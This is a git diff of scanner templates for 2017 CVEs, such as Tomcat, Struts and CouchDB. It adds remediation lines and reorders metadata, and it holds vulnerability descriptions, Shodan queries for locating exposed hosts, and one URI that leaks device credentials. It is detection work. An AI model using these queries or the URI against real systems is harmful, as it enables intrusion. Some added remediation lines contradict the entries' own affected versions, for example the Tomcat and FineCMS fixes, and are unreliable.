https://nvd.nist.gov/vuln/detail/CVE-2017-10974 @@ -16,8 +18,8 @@ info: cve-id: CVE-2017-10974 cwe-id: CWE-22 epss-score: 0.96161 - cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:* epss-percentile: 0.99289 + cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:* metadata: max-request: 1 vendor: yaws diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index d54dce4a90..efe49f232d 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | DataTaker DT80 dEX 1.50.012 is susceptible to information disclosure. A remote attacker can obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI, thereby possibly accessing sensitive information, modifying data, and/or executing unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate the information disclosure vulnerability. reference: - https://www.exploit-db.com/exploits/45094 - https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html @@ -17,14 +19,14 @@ info: cve-id: CVE-2017-11165 cwe-id: CWE-200 epss-score: 0.94336 - cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* epss-percentile: 0.98871 + cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"datataker" verified: true + max-request: 1 vendor: datataker product: dt80_dex_firmware + shodan-query: http.title:"datataker" tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure http: diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index a40a1c4a34..8dd23f10e7 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: "Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array." + remediation: | + Upgrade Subrion CMS to version 4.1.5.10 or later to mitigate this vulnerability. reference: - https://github.com/intelliants/subrion/issues/479 - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q @@ -15,8 +17,8 @@ info: cve-id: CVE-2017-11444 cwe-id: CWE-89 epss-score: 0.04447 - cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* epss-percentile: 0.91351 + cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelliants diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index c62296efa7..25bbeab7c3 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files. + remediation: | + Upgrade to a patched version of ManageEngine ServiceDesk 9.3.9328 or apply the necessary security patches. reference: - https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html - https://www.tenable.com/security/research/tra-2017-31 @@ -16,14 +18,14 @@ info: cve-id: CVE-2017-11512 cwe-id: CWE-22 epss-score: 0.97175 - cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* epss-percentile: 0.99714 + cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.title:"ManageEngine" verified: true + max-request: 2 vendor: manageengine product: servicedesk + shodan-query: http.title:"ManageEngine" tags: cve,cve2017,manageengine,lfr,unauth,tenable http: diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index 34c1c3ddc8..be88124dd2 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to FineCMS version 5.0.9 or later to fix the open redirect vulnerability. reference: - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse - https://nvd.nist.gov/vuln/detail/CVE-2017-11586 @@ -15,11 +17,11 @@ info: cve-id: CVE-2017-11586 cwe-id: CWE-601 epss-score: 0.00121 - cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* epss-percentile: 0.45569 + cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: finecms product: finecms tags: cve,cve2017,redirect,finecms diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index 1cbaf2861e..12f7e1eced 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -5,6 +5,8 @@ info: author: notnotnotveg severity: high description: The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups. + remediation: | + Apply the latest security patches or disable the XML-RPC server if not required. reference: - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md - https://nvd.nist.gov/vuln/detail/CVE-2017-11610 @@ -17,13 +19,13 @@ info: cve-id: CVE-2017-11610 cwe-id: CWE-276 epss-score: 0.97461 - cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:* epss-percentile: 0.99932 + cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"Supervisor Status" vendor: supervisord product: supervisor + shodan-query: http.title:"Supervisor Status" tags: oast,xmlrpc,msf,cve,cve2017,rce,supervisor http: diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index dc2ecf951d..8cb7b988bd 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request. + remediation: | + Upgrade to the latest version of FineCMS (>=5.0.11) which includes a fix for this vulnerability. reference: - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS @@ -16,11 +18,11 @@ info: cve-id: CVE-2017-11629 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* epss-percentile: 0.40499 + cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: finecms product: finecms tags: cve,cve2017,xss,finecms diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 1ea9ed9161..c7d018d096 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patch or upgrade to a newer version of XOOPS Core to fix the open redirect vulnerability. reference: - https://github.com/XOOPS/XoopsCore25/issues/523 - https://xoops.org @@ -15,8 +17,8 @@ info: cve-id: CVE-2017-12138 cwe-id: CWE-601 epss-score: 0.00062 - cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* epss-percentile: 0.24266 + cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* metadata: max-request: 2 vendor: xoops diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index db499ced39..74cefe700e 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -5,6 +5,8 @@ info: author: fopina,s0obi severity: critical description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data. + remediation: | + Apply the latest security patches and updates provided by Jboss to fix this vulnerability. reference: - https://chowdera.com/2020/12/20201229190934023w.html - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 @@ -17,8 +19,8 @@ info: cve-id: CVE-2017-12149 cwe-id: CWE-502 epss-score: 0.97292 - cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:* epss-percentile: 0.9979 + cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:* metadata: max-request: 3 vendor: redhat diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index 365e607162..bbfbfc573c 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability. + remediation: | + Upgrade HPE Integrated Lights-out 4 (ILO4) to version 2.53 or later to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/44005 - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 @@ -16,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2017-12542 epss-score: 0.97361 - cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99841 + cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hp diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index 6684f86c9d..d56380cb90 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -5,6 +5,8 @@ info: author: divya_mudgal severity: medium description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Apply the latest security patches or updates provided by HPE to fix the XSS vulnerability in the System Management software. reference: - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us - http://web.archive.org/web/20211206092413/https://securitytracker.com/id/1039437 @@ -16,8 +18,8 @@ info: cve-id: CVE-2017-12544 cwe-id: CWE-79 epss-score: 0.96723 - cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* epss-percentile: 0.99503 + cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hp diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 5bd2f1f47b..b8f4e8a471 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version of DokuWiki or apply the provided patch to fix the XSS vulnerability. reference: - https://github.com/splitbrain/dokuwiki/issues/2061 - https://nvd.nist.gov/vuln/detail/CVE-2017-12583 @@ -14,13 +16,13 @@ info: cve-id: CVE-2017-12583 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* epss-percentile: 0.40499 + cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"DokuWiki" vendor: dokuwiki product: dokuwiki + shodan-query: http.title:"DokuWiki" tags: cve,cve2017,xss,dokuwiki http: diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index 51841f9e8a..cc48a8b7fb 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: - https://struts.apache.org/docs/s2-053.html - https://nvd.nist.gov/vuln/detail/CVE-2017-12611 @@ -17,8 +19,8 @@ info: cve-id: CVE-2017-12611 cwe-id: CWE-20 epss-score: 0.97358 - cpe: cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:* epss-percentile: 0.99841 + cpe: cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 9252b0d4a8..2a60275827 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Tomcat. reference: - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E @@ -18,13 +20,13 @@ info: cve-id: CVE-2017-12615 cwe-id: CWE-434 epss-score: 0.97499 - cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* epss-percentile: 0.99962 + cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: title:"Apache Tomcat" vendor: apache product: tomcat + shodan-query: title:"Apache Tomcat" tags: rce,tomcat,kev,vulhub,cve,cve2017,apache,fileupload,intrusive http: diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 0460c90e4f..39dfd84822 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -6,6 +6,8 @@ info: severity: high description: | When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server. + remediation: | + Upgrade to Apache Tomcat version 7.0.80 or later to mitigate this vulnerability. reference: - https://versa-networks.com/blog/apache-tomcat-remote-code-execution-vulnerability-cve-2017-12617/ - https://github.com/cyberheartmi9/CVE-2017-12617 @@ -18,14 +20,14 @@ info: cve-id: "CVE-2017-12617" cwe-id: CWE-434 epss-score: 0.97542 - cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* epss-percentile: 0.9999 + cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 2 - shodan-query: html:"Apache Tomcat" vendor: apache product: tomcat + shodan-query: html:"Apache Tomcat" tags: cve,cve2017,tomcat,apache,rce,kev,intrusive http: diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index 4041581147..ed3861af9b 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr. + remediation: | + Upgrade to a patched version of Apache Solr (7.2 or higher) or apply the recommended security patches. reference: - https://twitter.com/honoki/status/1298636315613974532 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE @@ -17,8 +19,8 @@ info: cve-id: CVE-2017-12629 cwe-id: CWE-611 epss-score: 0.97452 - cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* epss-percentile: 0.99923 + cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index bda6a918aa..01abe6a5ba 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. + remediation: | + Upgrade Apache CouchDB to version 2.1.1 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-12635 - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E @@ -17,8 +19,8 @@ info: cve-id: CVE-2017-12635 cwe-id: CWE-269 epss-score: 0.97536 - cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* epss-percentile: 0.99988 + cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index f23e84563f..34fec57bb8 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -5,6 +5,8 @@ info: author: apt-mirror severity: high description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. + remediation: | + Apply the latest security patches and updates provided by SAP to fix the LFI vulnerability in SAP NetWeaver Application Server Java 7.5. reference: - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf - https://web.archive.org/web/20170807202056/http://www.sh0w.top/index.php/archives/7/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2017-12637 cwe-id: CWE-22 epss-score: 0.00648 - cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* epss-percentile: 0.76701 + cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:-266008933 vendor: sap product: netweaver_application_server_java + shodan-query: http.favicon.hash:-266008933 tags: cve,cve2017,sap,lfi,java,traversal http: diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 964e23d790..7e516b6081 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). + remediation: | + Upgrade to a patched version of Django or apply the necessary security patches provided by the Django project. reference: - https://twitter.com/sec715/status/1406779605055270914 - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 @@ -18,8 +20,8 @@ info: cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.00219 - cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* epss-percentile: 0.59163 + cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: djangoproject diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index ac40357f96..f3fcb3fe1c 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: critical description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py. + remediation: | + Apply the latest security patches or upgrade to a patched version of OpenDreambox. reference: - https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/ - https://www.exploit-db.com/exploits/42293 @@ -16,13 +18,13 @@ info: cve-id: CVE-2017-14135 cwe-id: CWE-78 epss-score: 0.96679 - cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* epss-percentile: 0.99486 + cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"Dreambox WebControl" vendor: dreambox product: opendreambox + shodan-query: title:"Dreambox WebControl" tags: cve2017,dreambox,rce,oast,edb,cve http: diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index f005c90402..1260cbe409 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not sanitized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below. + remediation: | + Apply the latest security patches or firmware updates provided by Fortinet to mitigate this vulnerability. reference: - https://www.fortiguard.com/psirt/FG-IR-17-242 - https://fortiguard.com/advisory/FG-IR-17-242 @@ -18,14 +20,14 @@ info: cve-id: CVE-2017-14186 cwe-id: CWE-79 epss-score: 0.02948 - cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* epss-percentile: 0.89542 + cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: port:10443 http.favicon.hash:945408572 verified: true + max-request: 1 vendor: fortinet product: fortios + shodan-query: port:10443 http.favicon.hash:945408572 tags: cve,cve2017,fortigate,xss,fortinet http: diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index bcf9d8d5ca..c9e3fe61d8 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 @@ -17,8 +19,8 @@ info: cve-id: CVE-2017-14524 cwe-id: CWE-601 epss-score: 0.00258 - cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* epss-percentile: 0.62785 + cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 vendor: opentext diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index ad229d6661..16a0c99bb3 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. + remediation: | + Upgrade to a patched version of Trixbox or apply the necessary security patches provided by the vendor. reference: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 @@ -17,8 +19,8 @@ info: cve-id: CVE-2017-14535 cwe-id: CWE-78 epss-score: 0.04456 - cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* epss-percentile: 0.91357 + cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netfortris diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index aefc911a52..71a5818719 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. + remediation: | + Apply the latest security patches or upgrade to a newer version of Trixbox to mitigate this vulnerability. reference: - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 @@ -16,8 +18,8 @@ info: cve-id: CVE-2017-14537 cwe-id: CWE-22 epss-score: 0.01002 - cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* epss-percentile: 0.81748 + cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 2 vendor: netfortris diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index a49ccd3551..5df9103dca 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks. + remediation: | + Update the WordPress 2kb Amazon Affiliates Store plugin to version 2.1.1 or later to mitigate the vulnerability. reference: - https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers @@ -17,14 +19,14 @@ info: cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47979 + cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: 2kblater product: 2kb_amazon_affiliates_store + framework: wordpress tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm http: diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index bbdf00d454..45ebd5741d 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -5,6 +5,8 @@ info: author: mass0ma severity: medium description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. + remediation: | + Upgrade to a patched version of WSO2 Data Analytics Server or apply the necessary security patches provided by the vendor. reference: - https://github.com/cybersecurityworks/Disclosed/issues/15 - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265 @@ -16,8 +18,8 @@ info: cve-id: CVE-2017-14651 cwe-id: CWE-79 epss-score: 0.00144 - cpe: 